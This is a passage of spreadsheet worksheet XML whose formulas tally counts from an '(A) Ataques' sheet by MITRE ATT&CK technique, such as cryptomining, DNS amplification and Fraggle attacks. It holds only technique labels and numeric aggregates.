      </c>
      <c r="AP60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CT60,"")</f>
        <v>3</v>
      </c>
      <c r="AQ60" s="4">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CV60,"")</f>
        <v>1</v>
      </c>
      <c r="AR60" s="20">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CW60,"")</f>
        <v>3</v>
      </c>
      <c r="AS60" s="287">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($AO60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT60" s="288">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!CX60,"")</f>
        <v>19</v>
      </c>
      <c r="AU60" s="392">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!CZ60,"")</f>
        <v>6</v>
      </c>
      <c r="AV60" s="4">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!DB60,"")</f>
        <v>4</v>
      </c>
      <c r="AW60" s="20">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!DC60,"")</f>
        <v>4</v>
      </c>
      <c r="AX60" s="331">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($AT60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY60" s="469">
        <f>'(A) Ataques'!LU60+'(A) Ataques'!MA60+'(A) Ataques'!MG60+'(A) Ataques'!MM60+'(A) Ataques'!MS60</f>
        <v>3</v>
      </c>
      <c r="AZ60" s="510">
        <f>'(A) Ataques'!LW60+'(A) Ataques'!MC60+'(A) Ataques'!MI60+'(A) Ataques'!MO60+'(A) Ataques'!MU60</f>
        <v>2</v>
      </c>
      <c r="BA60" s="471">
        <f>'(A) Ataques'!LY60+'(A) Ataques'!ME60+'(A) Ataques'!MK60+'(A) Ataques'!MQ60+'(A) Ataques'!MW60</f>
        <v>2</v>
      </c>
      <c r="BB60" s="471">
        <f>'(A) Ataques'!LQ60</f>
        <v>1</v>
      </c>
      <c r="BC60" s="331">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($AY60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD60" s="469">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!LL60,"")</f>
        <v>10</v>
      </c>
      <c r="BE60" s="510">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!LM60,"")</f>
        <v>9</v>
      </c>
      <c r="BF60" s="471">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!LN60,"")</f>
        <v>2</v>
      </c>
      <c r="BG60" s="471">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!LO60,"")</f>
        <v>4</v>
      </c>
      <c r="BH60" s="471">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!LS60,"")</f>
        <v>8</v>
      </c>
      <c r="BI60" s="331">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($BD60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ60" s="469">
        <f>'(A) Ataques'!OL60+'(A) Ataques'!OR60+'(A) Ataques'!OX60+'(A) Ataques'!PD60+'(A) Ataques'!PJ60</f>
        <v>0</v>
      </c>
      <c r="BK60" s="510">
        <f>'(A) Ataques'!ON60+'(A) Ataques'!OT60+'(A) Ataques'!OZ60+'(A) Ataques'!PF60+'(A) Ataques'!PL60</f>
        <v>0</v>
      </c>
      <c r="BL60" s="471">
        <f>'(A) Ataques'!OP60+'(A) Ataques'!OV60+'(A) Ataques'!PB60+'(A) Ataques'!PH60+'(A) Ataques'!PN60</f>
        <v>0</v>
      </c>
      <c r="BM60" s="495">
        <f>'(A) Ataques'!OH60</f>
        <v>0</v>
      </c>
      <c r="BN60" s="331">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($BJ60=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO60" s="469">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!OC60,"")</f>
        <v>0</v>
      </c>
      <c r="BP60" s="510">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!OD60,"")</f>
        <v>0</v>
      </c>
      <c r="BQ60" s="471">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!OE60,"")</f>
        <v>0</v>
      </c>
      <c r="BR60" s="471">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!OF60,"")</f>
        <v>0</v>
      </c>
      <c r="BS60" s="471">
        <f>IF('(A) Ataques'!$AP60&lt;&gt;"NO",'(A) Ataques'!OJ60,"")</f>
        <v>0</v>
      </c>
      <c r="BT60" s="331">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($BO60=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A61" s="79">
        <f t="shared" si="0"/>
        <v>59</v>
      </c>
      <c r="B61" s="4">
        <f>IF('(A) Ataques'!AK61&lt;&gt;"NO",'(A) Ataques'!E61,"")</f>
        <v>46</v>
      </c>
      <c r="C61" s="6" t="str">
        <f>IF('(A) Ataques'!AK61&lt;&gt;"NO",IF('(A) Ataques'!M61="","",'(A) Ataques'!M61),"")</f>
        <v>T1496-Cryptomining</v>
      </c>
      <c r="D61" s="4" t="str">
        <f>IF('(A) Ataques'!AK61&lt;&gt;"NO",'(A) Ataques'!F61,"")</f>
        <v>T1496</v>
      </c>
      <c r="E61" s="286">
        <f>IF('(A) Ataques'!AK61&lt;&gt;"NO",'(A) Ataques'!AQ61,"")</f>
        <v>12</v>
      </c>
      <c r="F61" s="288">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!BB61,"")</f>
        <v>6</v>
      </c>
      <c r="G61" s="392">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!BD61,"")</f>
        <v>6</v>
      </c>
      <c r="H61" s="4">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!BF61,"")</f>
        <v>3</v>
      </c>
      <c r="I61" s="20">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!BG61,"")</f>
        <v>2</v>
      </c>
      <c r="J61" s="530">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($F61=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BH61,"")</f>
        <v>0</v>
      </c>
      <c r="L61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BJ61,"")</f>
        <v>0</v>
      </c>
      <c r="M61" s="4">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BL61,"")</f>
        <v>0</v>
      </c>
      <c r="N61" s="20">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BM61,"")</f>
        <v>0</v>
      </c>
      <c r="O61" s="532">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($K61=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P61" s="292">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BN61,"")</f>
        <v>6</v>
      </c>
      <c r="Q61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BP61,"")</f>
        <v>6</v>
      </c>
      <c r="R61" s="4">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BR61,"")</f>
        <v>3</v>
      </c>
      <c r="S61" s="20">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BS61,"")</f>
        <v>2</v>
      </c>
      <c r="T61" s="530">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($P61=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BT61,"")</f>
        <v>8</v>
      </c>
      <c r="V61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BV61,"")</f>
        <v>8</v>
      </c>
      <c r="W61" s="4">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BX61,"")</f>
        <v>4</v>
      </c>
      <c r="X61" s="20">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$BY61,"")</f>
        <v>4</v>
      </c>
      <c r="Y61" s="532">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($U61=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z61" s="288">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!BZ61,"")</f>
        <v>6</v>
      </c>
      <c r="AA61" s="392">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!CB61,"")</f>
        <v>4</v>
      </c>
      <c r="AB61" s="4">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!CD61,"")</f>
        <v>2</v>
      </c>
      <c r="AC61" s="20">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!CE61,"")</f>
        <v>3</v>
      </c>
      <c r="AD61" s="331">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF(Z61=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CF61,"")</f>
        <v>14</v>
      </c>
      <c r="AF61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CH61,"")</f>
        <v>12</v>
      </c>
      <c r="AG61" s="4">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CJ61,"")</f>
        <v>6</v>
      </c>
      <c r="AH61" s="20">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CK61,"")</f>
        <v>4</v>
      </c>
      <c r="AI61" s="287">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($AE61=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ61" s="292">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CL61,"")</f>
        <v>0</v>
      </c>
      <c r="AK61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CN61,"")</f>
        <v>0</v>
      </c>
      <c r="AL61" s="4">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CP61,"")</f>
        <v>0</v>
      </c>
      <c r="AM61" s="20">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CQ61,"")</f>
        <v>0</v>
      </c>
      <c r="AN61" s="331">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($AJ61=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CR61,"")</f>
        <v>2</v>
      </c>
      <c r="AP61" s="322">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CT61,"")</f>
        <v>2</v>
      </c>
      <c r="AQ61" s="4">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CV61,"")</f>
        <v>1</v>
      </c>
      <c r="AR61" s="20">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!$CW61,"")</f>
        <v>2</v>
      </c>
      <c r="AS61" s="287">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($AO61=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT61" s="288">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!CX61,"")</f>
        <v>8</v>
      </c>
      <c r="AU61" s="392">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!CZ61,"")</f>
        <v>8</v>
      </c>
      <c r="AV61" s="4">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!DB61,"")</f>
        <v>4</v>
      </c>
      <c r="AW61" s="20">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",'(A) Ataques'!DC61,"")</f>
        <v>4</v>
      </c>
      <c r="AX61" s="331">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($AT61=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY61" s="469">
        <f>'(A) Ataques'!LU61+'(A) Ataques'!MA61+'(A) Ataques'!MG61+'(A) Ataques'!MM61+'(A) Ataques'!MS61</f>
        <v>0</v>
      </c>
      <c r="AZ61" s="510">
        <f>'(A) Ataques'!LW61+'(A) Ataques'!MC61+'(A) Ataques'!MI61+'(A) Ataques'!MO61+'(A) Ataques'!MU61</f>
        <v>0</v>
      </c>
      <c r="BA61" s="471">
        <f>'(A) Ataques'!LY61+'(A) Ataques'!ME61+'(A) Ataques'!MK61+'(A) Ataques'!MQ61+'(A) Ataques'!MW61</f>
        <v>0</v>
      </c>
      <c r="BB61" s="471">
        <f>'(A) Ataques'!LQ61</f>
        <v>0</v>
      </c>
      <c r="BC61" s="331">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($AY61=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD61" s="469">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!LL61,"")</f>
        <v>13</v>
      </c>
      <c r="BE61" s="510">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!LM61,"")</f>
        <v>10</v>
      </c>
      <c r="BF61" s="471">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!LN61,"")</f>
        <v>0</v>
      </c>
      <c r="BG61" s="471">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!LO61,"")</f>
        <v>5</v>
      </c>
      <c r="BH61" s="471">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!LS61,"")</f>
        <v>10</v>
      </c>
      <c r="BI61" s="331">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($BD61=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ61" s="469">
        <f>'(A) Ataques'!OL61+'(A) Ataques'!OR61+'(A) Ataques'!OX61+'(A) Ataques'!PD61+'(A) Ataques'!PJ61</f>
        <v>4</v>
      </c>
      <c r="BK61" s="510">
        <f>'(A) Ataques'!ON61+'(A) Ataques'!OT61+'(A) Ataques'!OZ61+'(A) Ataques'!PF61+'(A) Ataques'!PL61</f>
        <v>4</v>
      </c>
      <c r="BL61" s="471">
        <f>'(A) Ataques'!OP61+'(A) Ataques'!OV61+'(A) Ataques'!PB61+'(A) Ataques'!PH61+'(A) Ataques'!PN61</f>
        <v>2</v>
      </c>
      <c r="BM61" s="495">
        <f>'(A) Ataques'!OH61</f>
        <v>4</v>
      </c>
      <c r="BN61" s="331">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($BJ61=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO61" s="469">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!OC61,"")</f>
        <v>4</v>
      </c>
      <c r="BP61" s="510">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!OD61,"")</f>
        <v>4</v>
      </c>
      <c r="BQ61" s="471">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!OE61,"")</f>
        <v>2</v>
      </c>
      <c r="BR61" s="471">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!OF61,"")</f>
        <v>3</v>
      </c>
      <c r="BS61" s="471">
        <f>IF('(A) Ataques'!$AP61&lt;&gt;"NO",'(A) Ataques'!OJ61,"")</f>
        <v>4</v>
      </c>
      <c r="BT61" s="331">
        <f>IF('(A) Ataques'!$AK61&lt;&gt;"NO",IF($BO61=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A62" s="79">
        <f t="shared" si="0"/>
        <v>60</v>
      </c>
      <c r="B62" s="4">
        <f>IF('(A) Ataques'!AK62&lt;&gt;"NO",'(A) Ataques'!E62,"")</f>
        <v>47</v>
      </c>
      <c r="C62" s="6" t="str">
        <f>IF('(A) Ataques'!AK62&lt;&gt;"NO",IF('(A) Ataques'!M62="","",'(A) Ataques'!M62),"")</f>
        <v>T1498.002-Amplif_dns</v>
      </c>
      <c r="D62" s="4" t="str">
        <f>IF('(A) Ataques'!AK62&lt;&gt;"NO",'(A) Ataques'!F62,"")</f>
        <v>T1498</v>
      </c>
      <c r="E62" s="286">
        <f>IF('(A) Ataques'!AK62&lt;&gt;"NO",'(A) Ataques'!AQ62,"")</f>
        <v>5179</v>
      </c>
      <c r="F62" s="288">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!BB62,"")</f>
        <v>21</v>
      </c>
      <c r="G62" s="392">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!BD62,"")</f>
        <v>1</v>
      </c>
      <c r="H62" s="4">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!BF62,"")</f>
        <v>1</v>
      </c>
      <c r="I62" s="20">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!BG62,"")</f>
        <v>1</v>
      </c>
      <c r="J62" s="530">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($F62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BH62,"")</f>
        <v>0</v>
      </c>
      <c r="L62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BJ62,"")</f>
        <v>0</v>
      </c>
      <c r="M62" s="4">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BL62,"")</f>
        <v>0</v>
      </c>
      <c r="N62" s="20">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BM62,"")</f>
        <v>0</v>
      </c>
      <c r="O62" s="532">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($K62=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P62" s="292">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BN62,"")</f>
        <v>21</v>
      </c>
      <c r="Q62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BP62,"")</f>
        <v>1</v>
      </c>
      <c r="R62" s="4">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BR62,"")</f>
        <v>1</v>
      </c>
      <c r="S62" s="20">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BS62,"")</f>
        <v>1</v>
      </c>
      <c r="T62" s="530">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($P62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BT62,"")</f>
        <v>690</v>
      </c>
      <c r="V62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BV62,"")</f>
        <v>19</v>
      </c>
      <c r="W62" s="4">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BX62,"")</f>
        <v>2</v>
      </c>
      <c r="X62" s="20">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$BY62,"")</f>
        <v>19</v>
      </c>
      <c r="Y62" s="532">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($U62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z62" s="288">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!BZ62,"")</f>
        <v>57</v>
      </c>
      <c r="AA62" s="392">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!CB62,"")</f>
        <v>34</v>
      </c>
      <c r="AB62" s="4">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!CD62,"")</f>
        <v>6</v>
      </c>
      <c r="AC62" s="20">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!CE62,"")</f>
        <v>31</v>
      </c>
      <c r="AD62" s="331">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF(Z62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CF62,"")</f>
        <v>747</v>
      </c>
      <c r="AF62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CH62,"")</f>
        <v>53</v>
      </c>
      <c r="AG62" s="4">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CJ62,"")</f>
        <v>8</v>
      </c>
      <c r="AH62" s="20">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CK62,"")</f>
        <v>48</v>
      </c>
      <c r="AI62" s="287">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($AE62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ62" s="292">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CL62,"")</f>
        <v>0</v>
      </c>
      <c r="AK62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CN62,"")</f>
        <v>0</v>
      </c>
      <c r="AL62" s="4">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CP62,"")</f>
        <v>0</v>
      </c>
      <c r="AM62" s="20">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CQ62,"")</f>
        <v>0</v>
      </c>
      <c r="AN62" s="331">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($AJ62=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CR62,"")</f>
        <v>669</v>
      </c>
      <c r="AP62" s="322">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CT62,"")</f>
        <v>18</v>
      </c>
      <c r="AQ62" s="4">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CV62,"")</f>
        <v>1</v>
      </c>
      <c r="AR62" s="20">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!$CW62,"")</f>
        <v>18</v>
      </c>
      <c r="AS62" s="287">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($AO62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT62" s="288">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!CX62,"")</f>
        <v>690</v>
      </c>
      <c r="AU62" s="392">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!CZ62,"")</f>
        <v>19</v>
      </c>
      <c r="AV62" s="4">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!DB62,"")</f>
        <v>2</v>
      </c>
      <c r="AW62" s="20">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",'(A) Ataques'!DC62,"")</f>
        <v>19</v>
      </c>
      <c r="AX62" s="331">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($AT62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY62" s="469">
        <f>'(A) Ataques'!LU62+'(A) Ataques'!MA62+'(A) Ataques'!MG62+'(A) Ataques'!MM62+'(A) Ataques'!MS62</f>
        <v>2</v>
      </c>
      <c r="AZ62" s="510">
        <f>'(A) Ataques'!LW62+'(A) Ataques'!MC62+'(A) Ataques'!MI62+'(A) Ataques'!MO62+'(A) Ataques'!MU62</f>
        <v>1</v>
      </c>
      <c r="BA62" s="471">
        <f>'(A) Ataques'!LY62+'(A) Ataques'!ME62+'(A) Ataques'!MK62+'(A) Ataques'!MQ62+'(A) Ataques'!MW62</f>
        <v>1</v>
      </c>
      <c r="BB62" s="471">
        <f>'(A) Ataques'!LQ62</f>
        <v>1</v>
      </c>
      <c r="BC62" s="331">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($AY62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD62" s="469">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!LL62,"")</f>
        <v>679</v>
      </c>
      <c r="BE62" s="510">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!LM62,"")</f>
        <v>10</v>
      </c>
      <c r="BF62" s="471">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!LN62,"")</f>
        <v>1</v>
      </c>
      <c r="BG62" s="471">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!LO62,"")</f>
        <v>2</v>
      </c>
      <c r="BH62" s="471">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!LS62,"")</f>
        <v>9</v>
      </c>
      <c r="BI62" s="331">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($BD62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ62" s="469">
        <f>'(A) Ataques'!OL62+'(A) Ataques'!OR62+'(A) Ataques'!OX62+'(A) Ataques'!PD62+'(A) Ataques'!PJ62</f>
        <v>1</v>
      </c>
      <c r="BK62" s="510">
        <f>'(A) Ataques'!ON62+'(A) Ataques'!OT62+'(A) Ataques'!OZ62+'(A) Ataques'!PF62+'(A) Ataques'!PL62</f>
        <v>1</v>
      </c>
      <c r="BL62" s="471">
        <f>'(A) Ataques'!OP62+'(A) Ataques'!OV62+'(A) Ataques'!PB62+'(A) Ataques'!PH62+'(A) Ataques'!PN62</f>
        <v>1</v>
      </c>
      <c r="BM62" s="495">
        <f>'(A) Ataques'!OH62</f>
        <v>1</v>
      </c>
      <c r="BN62" s="331">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($BJ62=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO62" s="469">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!OC62,"")</f>
        <v>1</v>
      </c>
      <c r="BP62" s="510">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!OD62,"")</f>
        <v>1</v>
      </c>
      <c r="BQ62" s="471">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!OE62,"")</f>
        <v>1</v>
      </c>
      <c r="BR62" s="471">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!OF62,"")</f>
        <v>1</v>
      </c>
      <c r="BS62" s="471">
        <f>IF('(A) Ataques'!$AP62&lt;&gt;"NO",'(A) Ataques'!OJ62,"")</f>
        <v>1</v>
      </c>
      <c r="BT62" s="331">
        <f>IF('(A) Ataques'!$AK62&lt;&gt;"NO",IF($BO62=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A63" s="79">
        <f t="shared" si="0"/>
        <v>61</v>
      </c>
      <c r="B63" s="4">
        <f>IF('(A) Ataques'!AK63&lt;&gt;"NO",'(A) Ataques'!E63,"")</f>
        <v>47</v>
      </c>
      <c r="C63" s="6" t="str">
        <f>IF('(A) Ataques'!AK63&lt;&gt;"NO",IF('(A) Ataques'!M63="","",'(A) Ataques'!M63),"")</f>
        <v>T1498.002-Fraggle</v>
      </c>
      <c r="D63" s="4" t="str">
        <f>IF('(A) Ataques'!AK63&lt;&gt;"NO",'(A) Ataques'!F63,"")</f>
        <v>T1498</v>
      </c>
      <c r="E63" s="286">
        <f>IF('(A) Ataques'!AK63&lt;&gt;"NO",'(A) Ataques'!AQ63,"")</f>
        <v>1427</v>
      </c>
      <c r="F63" s="288">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!BB63,"")</f>
        <v>0</v>
      </c>
      <c r="G63" s="392">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!BD63,"")</f>
        <v>0</v>
      </c>
      <c r="H63" s="4">
